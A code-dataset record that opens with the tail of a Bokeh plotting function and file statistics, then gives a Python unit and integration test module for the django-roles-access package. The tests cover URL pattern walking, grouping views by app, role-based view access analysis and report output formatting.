<span style="font-size: 15px; font-weight: bold;">HRS Order: </span>
<span style="font-size: 15px;"> @HrsOrder</span>
</div>
</div>
"""
)
p = figure(title="HRS Order Position Low Resolution",
x_axis_label='Date',
y_axis_label='y_upper',
x_axis_type='datetime',
tools=[tool_list, _hover])
    p.scatter(source=low_source, x='Date', y='y_upper', color='colors', fill_alpha=0.2, size=10)
p.xaxis[0].formatter = date_formatter
return p
| 35.530686 | 109 | 0.517984 | 1,144 | 9,842 | 4.298951 | 0.138112 | 0.04026 | 0.058154 | 0.076047 | 0.817405 | 0.782432 | 0.754168 | 0.741765 | 0.729565 | 0.729565 | 0 | 0.01578 | 0.356127 | 9,842 | 277 | 110 | 35.530686 | 0.760297 | 0.146617 | 0 | 0.672515 | 0 | 0.070175 | 0.471564 | 0.021701 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0 | 0.040936 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
e6783e2d5b99dd220ab72c9c82dce296b3c378e7
| 49,475 |
py
|
Python
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | 5 |
2019-03-22T08:08:25.000Z
|
2019-04-11T11:46:52.000Z
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | 5 |
2019-04-03T21:53:52.000Z
|
2019-05-22T22:41:34.000Z
|
tests/test_utils.py
|
django-roles-access/master
|
066d0d6b99b986eacc736e6973b415cbb9172d46
|
[
"MIT"
] | null | null | null |
from importlib import import_module
from unittest import TestCase as UnitTestCase
from django.contrib.auth.models import Group
from django.core.management import BaseCommand
from django.conf import settings
from django.test import TestCase
from django.views.generic import TemplateView
try:
from unittest.mock import Mock, patch, MagicMock
except ImportError:
    from mock import Mock, patch, MagicMock
from django_roles_access.decorator import access_by_role
from django_roles_access.mixin import RolesMixin
from django_roles_access.models import ViewAccess
from tests import views
from django_roles_access.utils import (walk_site_url, get_views_by_app,
view_access_analyzer,
get_view_analyze_report,
check_django_roles_is_used,
analyze_by_role, APP_NAME_FOR_NONE,
NOT_SECURED_DEFAULT, SECURED_DEFAULT,
PUBLIC_DEFAULT, NONE_TYPE_DEFAULT,
DISABLED_DEFAULT, OutputReport)
class MockRegex:
def __init__(self):
self.pattern = '^fake-regex-pattern/$'
class MockRegexResolver:
def __init__(self):
self.pattern = '^fake-resolver/'
class MockRegexResolverNested:
def __init__(self):
self.pattern = '^fake-nested-resolver/'
class MockPattern:
def __init__(self):
self.regex = MockRegex()
self.callback = 'fake-callback'
self.name = 'fake-view-name'
class MockResolver:
def __init__(self):
self.url_patterns = [MockPattern()]
self.regex = MockRegexResolver()
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverNested:
def __init__(self):
self.url_patterns = [MockResolver()]
self.regex = MockRegexResolverNested()
self.app_name = 'fake-app-name'
self.namespace = 'nested-namespace'
class MockPatternDjango2:
def __init__(self):
self.pattern = '^fake-pattern/'
self.callback = 'fake-callback'
self.name = 'fake-view-name'
class MockPatternDjango2None:
def __init__(self):
self.pattern = '^fake-pattern/'
self.callback = 'fake-callback'
self.name = 'fake-view-none'
class MockResolverDjango2:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockPatternDjango2()]
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverDjango2None:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockPatternDjango2None()]
self.app_name = None
self.namespace = None
class MockResolverDjango2None2:
def __init__(self):
self.pattern = '^fake-resolver/'
self.url_patterns = [MockResolverDjango2None()]
self.app_name = 'fake-app-name'
self.namespace = 'fake-namespace'
class MockResolverDjangoNested:
def __init__(self):
self.pattern = '^fake-nested-resolver/'
self.url_patterns = [MockResolverDjango2()]
self.app_name = 'fake-app-name'
self.namespace = 'nested-namespace'
class UnitTestWalkSiteURL(UnitTestCase):
def setUp(self):
self.pattern_1 = MockPattern()
self.data = [self.pattern_1]
def test_second_param_is_optional_return_a_list(self):
result = walk_site_url(self.data)
self.assertIsInstance(result, list)
def test_first_param_list_of_pattern_and_view(self):
result = walk_site_url(self.data)
self.assertEqual(result, [('fake-regex-pattern/', 'fake-callback',
'fake-view-name', None)])
def test_first_param_list_of_patterns_and_views(self):
pattern_2 = MockPattern()
pattern_2.regex.pattern = 'fake-regex-pattern-2/'
pattern_2.callback = 'fake-view-2'
result = walk_site_url([self.pattern_1, pattern_2])
self.assertEqual(result, [('fake-regex-pattern/', 'fake-callback',
'fake-view-name', None),
('fake-regex-pattern-2/', 'fake-view-2',
'fake-view-name', None)])
def test_param_list_with_pattern_and_resolver_django_1(self):
expected_result = [
('fake-regex-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-resolver/fake-regex-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
)]
resolver = MockResolver()
result = walk_site_url([self.pattern_1, resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_nested_resolver_django_1(self):
expected_result = [
('fake-regex-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-nested-resolver/fake-resolver/fake-regex-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
resolver = MockResolverNested()
result = walk_site_url([self.pattern_1, resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_resolver_django_2(self):
expected_result = [
('fake-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-resolver/fake-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
)
]
resolver = MockResolverDjango2()
result = walk_site_url([MockPatternDjango2(), resolver])
self.assertEqual(result, expected_result)
def test_param_list_with_pattern_and_nested_resolver_django_2(self):
expected_result = [
('fake-pattern/', 'fake-callback', 'fake-view-name', None),
('fake-nested-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
result = walk_site_url([MockPatternDjango2(),
MockResolverDjangoNested()])
self.assertEqual(result, expected_result)
def test_param_list_with_resolver_get_app_name_and_view_name_django_1(self):
expected_result = [
('fake-resolver/fake-regex-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
),
('fake-nested-resolver/fake-resolver/fake-regex-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
result = walk_site_url([MockResolver(), MockResolverNested()])
self.assertEqual(result, expected_result)
def test_param_list_with_resolver_get_app_name_and_view_name_django_2(self):
expected_result = [
('fake-resolver/fake-pattern/',
'fake-callback', 'fake-namespace:fake-view-name', 'fake-app-name'
),
('fake-nested-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'nested-namespace:fake-namespace:fake-view-name',
'fake-app-name'
)
]
resolver = MockResolverDjango2()
nested_resolver = MockResolverDjangoNested()
result = walk_site_url([resolver, nested_resolver])
self.assertEqual(result, expected_result)
def test_when_url_namespace_is_None(self):
expected_result = [
('fake-resolver/fake-resolver/fake-pattern/',
'fake-callback', 'fake-view-none', None
)
]
resolver = MockResolverDjango2None2()
result = walk_site_url([resolver])
self.assertEqual(result, expected_result)
# def test_when_view_name_is_None(self):
# expected_result = [
# ('fake-resolver/fake-pattern/',
# 'fake-callback', 'fake-view-name', None
# )
# ]
# resolver = MockResolverDjango2None2()
# result = walk_site_url([resolver])
# print(result)
# self.assertEqual(result, expected_result)
class IntegratedTestWalkSiteURL(TestCase):
def setUp(self):
self.url = import_module(settings.ROOT_URLCONF).urlpatterns
def test_found_direct_access_view(self):
expected_result = ('direct_access_view/',
views.protected_view_by_role,
'direct_access_view', None)
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_included_view_without_namespace(self):
expected_result = ('role-included[135]/view_by_role/',
views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
'django_roles_access')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_included_view_with_namespace(self):
expected_result = ('role-included2/view_by_role/',
views.protected_view_by_role,
'app-ns2:view_protected_by_role',
'django_roles_access')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
def test_found_nested_access_view(self):
expected_result = ('nest1/nest2/view_by_role/',
views.protected_view_by_role,
'nest1_namespace:nest2_namespace:view_'
'protected_by_role',
'roles-app-name')
result = walk_site_url(self.url)
self.assertIn(expected_result, result)
class UnitTestGetViewsByApp(UnitTestCase):
"""
get_views_by_app receive the result of walk_site_url and is required to
return a dictionary with keys been installed applications.
"""
def setUp(self):
self.data = [('a', 'b', 'c', 'fake-app-1')]
@patch('django_roles_access.utils.settings')
def test_returns_a_dictionary(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
self.assertIsInstance(result, dict)
@patch('django_roles_access.utils.settings')
def test_returns_a_dictionary_with_all_installed_apps(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
assert 'fake-app-1' in result
assert 'fake-app-2' in result
@patch('django_roles_access.utils.settings')
def test_values_of_returned_dictionary_keys_are_lists(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2']
result = get_views_by_app(self.data)
self.assertIsInstance(result['fake-app-1'], list)
self.assertIsInstance(result['fake-app-2'], list)
@patch('django_roles_access.utils.settings')
def test_receive_list_of_tuples_with_4_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
result = get_views_by_app(self.data)
assert 'fake-app-1' in result
@patch('django_roles_access.utils.settings')
def test_raise_type_error_if_receive_list_of_tuples_with_3_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
data = [('a', 'b', 'c')]
with self.assertRaises(TypeError):
get_views_by_app(data)
@patch('django_roles_access.utils.settings')
def test_raise_type_error_if_receive_list_of_tuples_with_5_element(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1']
data = [('a', 'b', 'c', 'd', 'e')]
with self.assertRaises(TypeError):
get_views_by_app(data)
@patch('django_roles_access.utils.settings')
def test_received_data_is_ordered_and_returned_by_application(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
data = [('a', 'b', 'c', 'fake-app-1'), ('1', '2', '3', 'fake-app-2'),
('a1', 'b2', 'c3', None)]
expected_result = [('a', 'b', 'c')]
result = get_views_by_app(data)
self.assertEqual(expected_result, result['fake-app-1'])
@patch('django_roles_access.utils.settings')
def test_can_work_with_no_declared_application_name(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
data = [('a', 'b', 'c', 'fake-app-1'), ('1', '2', '3', 'fake-app-2'),
('a1', 'b2', 'c3', None)]
expected_result = [('a1', 'b2', 'c3')]
result = get_views_by_app(data)
self.assertEqual(expected_result, result[APP_NAME_FOR_NONE])
@patch('django_roles_access.utils.settings')
def test_if_application_is_not_in_installed_apps_will_not_be_in_dict(
self, mock_settings
):
mock_settings.INSTALLED_APPS = ['fake-app-1', 'fake-app-2', None]
result = get_views_by_app(self.data)
assert 'fake-app-3' not in result
class IntegratedTestGetViewsByApp(TestCase):
def setUp(self):
self.url = import_module(settings.ROOT_URLCONF).urlpatterns
def test_not_declared_app_are_recognized_as_undefined_app(self):
expected_result = ('direct_access_view/',
views.protected_view_by_role,
'direct_access_view')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result[APP_NAME_FOR_NONE])
def test_views_without_namespace_are_added_with_app_name_in_view_name(self):
expected_result = ('role-included[135]/view_by_role/',
views.protected_view_by_role,
'django_roles_access:view_protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['django_roles_access'])
def test_view_with_namespace_are_added_with_correct_app_name(self):
expected_result = ('role-included2/view_by_role/',
views.protected_view_by_role,
'app-ns2:view_protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['django_roles_access'])
def test_nested_namespace_are_added_with_correct_app_name(self):
expected_result = ('nest1/nest2/view_by_role/',
views.protected_view_by_role,
'nest1_namespace:nest2_namespace:view_'
'protected_by_role')
result = get_views_by_app(walk_site_url(self.url))
self.assertIn(expected_result, result['roles-app-name'])
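# get_view_analyze_report maps an application type (None, 'NOT_SECURED',
# 'DISABLED', 'SECURED', 'PUBLIC') to its default report line, prefixed with a
# tab; the tests below pin that mapping against the *_DEFAULT constants.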
class TestGetViewAnalyzeReport(UnitTestCase):
def test_report_for_no_application_type(self):
expected = u'\t' + NONE_TYPE_DEFAULT
result = get_view_analyze_report(None)
self.assertEqual(result, expected)
def test_report_for_application_type_NOT_SECURED(self):
expected = u'\t' + NOT_SECURED_DEFAULT
result = get_view_analyze_report('NOT_SECURED')
self.assertEqual(result, expected)
def test_report_for_application_type_DISABLED(self):
expected = u'\t' + DISABLED_DEFAULT
result = get_view_analyze_report('DISABLED')
self.assertEqual(result, expected)
def test_report_for_application_type_SECURED(self):
expected = u'\t' + SECURED_DEFAULT
result = get_view_analyze_report('SECURED')
self.assertEqual(result, expected)
def test_report_for_application_type_PUBLIC(self):
expected = u'\t' + PUBLIC_DEFAULT
result = get_view_analyze_report('PUBLIC')
self.assertEqual(result, expected)
class TestCheckDjangoRolesIsUsed(UnitTestCase):
def test_detect_view_is_decorated(self):
@access_by_role
def function():
pass
self.assertTrue(check_django_roles_is_used(function))
def test_detect_view_is_not_decorated(self):
def function():
pass
self.assertFalse(check_django_roles_is_used(function))
def test_detect_view_use_mixin(self):
class Aview(RolesMixin, TemplateView):
template_name = 'dummyTemplate.html'
self.assertTrue(check_django_roles_is_used(Aview))
def test_detect_view_not_use_mixin(self):
class Aview(TemplateView):
template_name = 'dummyTemplate.html'
self.assertFalse(check_django_roles_is_used(Aview))
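# Class-level @patch: unittest.mock applies the patch to every test method and
# passes the created mock as the extra `mock_view_access` argument below.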
@patch('django_roles_access.utils.ViewAccess')
class UnitTestAnalyzeByRoleAccess(UnitTestCase):
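# NOTE: the expected strings in this class mirror the messages emitted by
# django_roles_access verbatim, misspellings included ('access de view').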
def test_detect_access_is_by_role(
self, mock_view_access
):
expected = u'ERROR: No roles configured to access de view.'
mock_view_access.type = 'br'
mock_view_access.roles.count.return_value = 0
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role(
self, mock_view_access
):
expected = u''
mock_view_access.type = 'pu'
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_by_role_with_roles(
self, mock_view_access
):
expected = u'Roles with access: role-1, role-2'
mock_view_access.type = 'br'
role_1 = Mock()
role_1.name = u'role-1'
role_2 = Mock()
role_2.name = u'role-2'
mock_view_access.roles.all.return_value = [role_1, role_2]
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
def test_detect_access_is_by_role_without_roles(
self, mock_view_access
):
expected = u'ERROR: No roles configured to access de view.'
mock_view_access.type = 'br'
mock_view_access.roles.count.return_value = 0
result = analyze_by_role(mock_view_access)
self.assertEqual(result, expected)
class IntegratedTestAnalyzeByRoleAccess(TestCase):
def test_detect_access_is_by_role(self):
expected = u'ERROR: No roles configured to access de view.'
view_access = ViewAccess.objects.create(view='any-name', type='br')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_not_by_role(self):
expected = u''
view_access = ViewAccess.objects.create(view='any-name', type='pu')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_by_role_with_roles(self):
expected = u'Roles with access: role-1, role-2'
view_access = ViewAccess.objects.create(view='any-name', type='br')
role_1, created = Group.objects.get_or_create(name='role-1')
role_2, created = Group.objects.get_or_create(name='role-2')
view_access.roles.add(role_1)
view_access.roles.add(role_2)
view_access.save()
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
def test_detect_access_is_by_role_without_roles(self):
expected = u'ERROR: No roles configured to access de view.'
view_access = ViewAccess.objects.create(view='any-name', type='br')
result = analyze_by_role(view_access)
self.assertEqual(result, expected)
@patch('django_roles_access.utils.ViewAccess.objects')
class UnitTestViewAnalyzer(UnitTestCase):
def test_view_analyzer_return_a_report(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
try:
# Python 2: reports are unicode; on Python 3 `unicode` raises NameError
# and the plain str check below applies instead.
self.assertIsInstance(result, unicode)
except NameError:
self.assertIsInstance(result, str)
def test_view_analyzer_search_view_access_for_the_view(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
assert mock_objects.first.called
def test_view_analyzer_search_view_access_for_the_view_once(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
self.assertEqual(mock_objects.filter.call_count, 1)
def test_view_analyzer_search_view_access_with_view_name(
self, mock_objects
):
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', 'fake-site-active')
mock_objects.filter.assert_called_once_with(view='fake-view-name')
def test_view_access_type_when_site_active_and_exists_view_access(
self, mock_objects
):
expected = u'View access is of type Public.'
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
assert mock_analyze_by_role.called
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role_once(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
self.assertEqual(mock_analyze_by_role.call_count, 1)
@patch('django_roles_access.utils.analyze_by_role')
def test_view_access_type_by_role_call_analyze_by_role_with_view_access(
self, mock_analyze_by_role, mock_objects
):
view_access = Mock()
view_access.type = 'br'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
view_access_analyzer('fake-app-type', 'fake-callback',
'fake-view-name', True)
mock_analyze_by_role.assert_called_once_with(view_access)
def test_no_view_access_object_for_the_view_and_site_active_no_app_type(
self, mock_objects
):
expected = u'\t' + NONE_TYPE_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer(None, 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_NOT_SECURED(
self, mock_objects
):
expected = u'\t' + NOT_SECURED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('NOT_SECURED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_DISABLED(
self, mock_objects
):
expected = u'\t' + DISABLED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('DISABLED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_SECURED(
self, mock_objects
):
expected = u'\t' + SECURED_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('SECURED', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_no_view_access_object_and_site_active_app_type_PUBLIC(
self, mock_objects
):
expected = u'\t' + PUBLIC_DEFAULT
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('PUBLIC', 'fake-callback',
'fake-view-name', True)
self.assertEqual(result, expected)
def test_middleware_not_used_view_access_object_exist_and_dr_tools_used(
self, mock_objects
):
expected = u'View access is of type Public.'
@access_by_role
def function():
pass
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_middleware_not_used_view_access_object_exist_and_dr_tools_not_used(
self, mock_objects
):
expected = u'ERROR: View access object exist for the view, but no '
expected += u'Django role access tool is used: neither decorator, '
expected += u'mixin, or middleware.'
def function():
pass
view_access = Mock()
view_access.type = 'pu'
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = view_access
result = view_access_analyzer('fake-app-type', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_middleware_not_used_dr_tools_are_used_no_view_access_object(
self, mock_objects
):
expected = u'\t' + PUBLIC_DEFAULT
@access_by_role
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('PUBLIC', function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_no_django_roles_tools_used_no_application_type(
self, mock_objects
):
expected = u'No Django roles access tool used. Access to view depends '
expected += u'on its implementation.'
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer(None, function,
'fake-view-name', False)
self.assertEqual(result, expected)
def test_no_django_roles_tools_used_application_type(
self, mock_objects
):
expected = u'No Django roles access tool used. Access to view depends '
expected += u'on its implementation.'
def function():
pass
mock_objects.filter.return_value = mock_objects
mock_objects.first.return_value = None
result = view_access_analyzer('Authorized', function,
'fake-view-name', False)
self.assertEqual(result, expected)
class IntegratedTestViewAnalyzer(TestCase):
def test_with_middleware_SECURED_without_view_access_object(self):
expected = u'\t' + SECURED_DEFAULT
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(expected, result)
def test_with_middleware_NOT_SECURED_with_view_access_object(self):
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
result = view_access_analyzer(
'NOT_SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, u'\t' + NOT_SECURED_DEFAULT)
def test_with_middleware_DISABLED_with_view_access_object(self):
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='pu')
result = view_access_analyzer(
'DISABLED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, u'\t' + DISABLED_DEFAULT)
def test_with_middleware_with_view_access_object(self):
expected = u'View access is of type By role.'
expected += u'ERROR: No roles configured to access de view.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_with_roles(self):
expected = u'View access is of type By role.'
expected += u'Roles with access: test1, test2'
g1, created = Group.objects.get_or_create(name='test1')
g2, created = Group.objects.get_or_create(name='test2')
view_access = ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='br')
view_access.roles.add(g1)
view_access.roles.add(g2)
view_access.save()
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_authorized(self):
expected = u'View access is of type Authorized.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='au')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_with_middleware_with_view_access_object_public(self):
expected = u'View access is of type Public.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_class',
type='pu')
result = view_access_analyzer(
'SECURED', views.MiddlewareView.as_view,
'django_roles_access:middleware_view_class',
True)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object(self):
expected = u'View access is of type By role.'
expected += u'ERROR: No roles configured to access de view.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='br')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_with_roles(self):
expected = u'View access is of type By role.'
expected += u'Roles with access: test1, test2'
g1, created = Group.objects.get_or_create(name='test1')
g2, created = Group.objects.get_or_create(name='test2')
view_access = ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='br')
view_access.roles.add(g1)
view_access.roles.add(g2)
view_access.save()
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_authorized(self):
expected = u'View access is of type Authorized.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='au')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_public(self):
expected = u'View access is of type Public.'
ViewAccess.objects.create(
view='django_roles_access:view_protected_by_role',
type='pu')
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_without_view_access_object_and_view_protected(
self
):
expected = u'\t' + SECURED_DEFAULT
result = view_access_analyzer(
'SECURED', views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_no_view_access_object_and_view_protected_without_app(
self
):
expected = u'\t' + NONE_TYPE_DEFAULT
result = view_access_analyzer(
None, views.protected_view_by_role,
'django_roles_access:view_protected_by_role',
False)
self.assertEqual(result, expected)
def test_without_middleware_with_view_access_object_and_view_not_protected(
self
):
expected = u'ERROR: View access object exist for the view, '
expected += 'but no Django role access tool is used: neither '
expected += 'decorator, mixin, or middleware.'
ViewAccess.objects.create(
view='django_roles_access:middleware_view_func',
type='pu')
result = view_access_analyzer(
None, views.middleware_view,
'django_roles_access:middleware_view_func',
False)
self.assertEqual(result, expected)
class UnitTestOutputReport(UnitTestCase):
def setUp(self):
self.patch_mock_stdout = patch.object(BaseCommand(), 'stdout')
self.patch_mock_style = patch.object(BaseCommand(), 'style')
self.mock_stdout = self.patch_mock_stdout.start()
self.mock_style = self.patch_mock_style.start()
self._output = OutputReport(self.mock_stdout, self.mock_style)
def tearDown(self):
self.patch_mock_stdout.stop()
self.patch_mock_style.stop()
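# Usage sketch (API inferred from the tests below, not taken from library
# docs): OutputReport wraps a management command's stdout/style pair, e.g.
#   output = OutputReport(command.stdout, command.style)
#   output.set_format('csv')
#   output.write_header()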
def test_initial_with_parameter(self):
assert self._output.stdout == self.mock_stdout
assert self._output.style == self.mock_style
def test_internal_attributes_are_initialized(self):
assert hasattr(self._output, '_row') and self._output._row == u''
assert hasattr(self._output, '_format') and self._output._format == \
'console'
def test_initial_without_parameter(self):
with self.assertRaises(TypeError):
OutputReport()
def test_default_output_format_is_correct_type(self):
assert self._output._format == 'console'
def test_set_format(self):
self._output.set_format('csv')
assert self._output._format == 'csv'
def test_add_to_row(self):
self._output.add_to_row('text')
self._output.add_to_row('other')
self.assertIn('text', self._output._row)
self.assertIn('other', self._output._row)
def test_write_method_write_to_stdout(self):
self._output.write(u'some text')
assert self.mock_stdout.write.called
def test_write_method_use_stdout_write_once(self):
self._output.write(u'some text')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_write_method_use_SUCCESS_style_for_styling_output(self):
self._output.write(u'some text')
self.mock_stdout.write.assert_called_once_with(
self.mock_style.SUCCESS())
def test_write_method_use_SUCCESS_style_for_output(self):
self._output.write(u'some text')
assert self.mock_style.SUCCESS.called
def test_write_method_use_style_with_received_argument(self):
self._output.write(u'some text')
self.mock_style.SUCCESS.assert_called_once_with(u'some text')
def test_console_format_write_correct_header_to_stdout_with_SUCCESS_style(
self
):
expected = u'Start checking views access.\n'
expected += u'Start gathering information.'
self._output.write_header()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
@patch('django_roles_access.utils.timezone')
def test_csv_format_write_correct_header(
self, mock_timezone
):
mock_timezone.now.return_value = 'fake-date'
self._output.set_format('csv')
self._output.write_header()
self.mock_style.SUCCESS.assert_called_once_with(u'Reported: fake-date')
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_write_correct_middleware_status_and_end_of_header(
self
):
expected = u'Django roles access middleware is active: False.\n'
self._output.write_middleware_status(False)
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_console_format_write_correct_end_of_header(
self
):
expected = u'Finish gathering information.'
self._output.write_end_of_head()
self.mock_style.SUCCESS.assert_called_once_with(expected)
self.assertEqual(self.mock_stdout.write.call_count, 1)
def test_csv_format_write_correct_middleware_status(
self
):
expected = u'Django roles access middleware is active: False.\n'
self._output.set_format('csv')
self._output.write_middleware_status(False)
self.mock_style.SUCCESS.assert_called_once_with(expected)
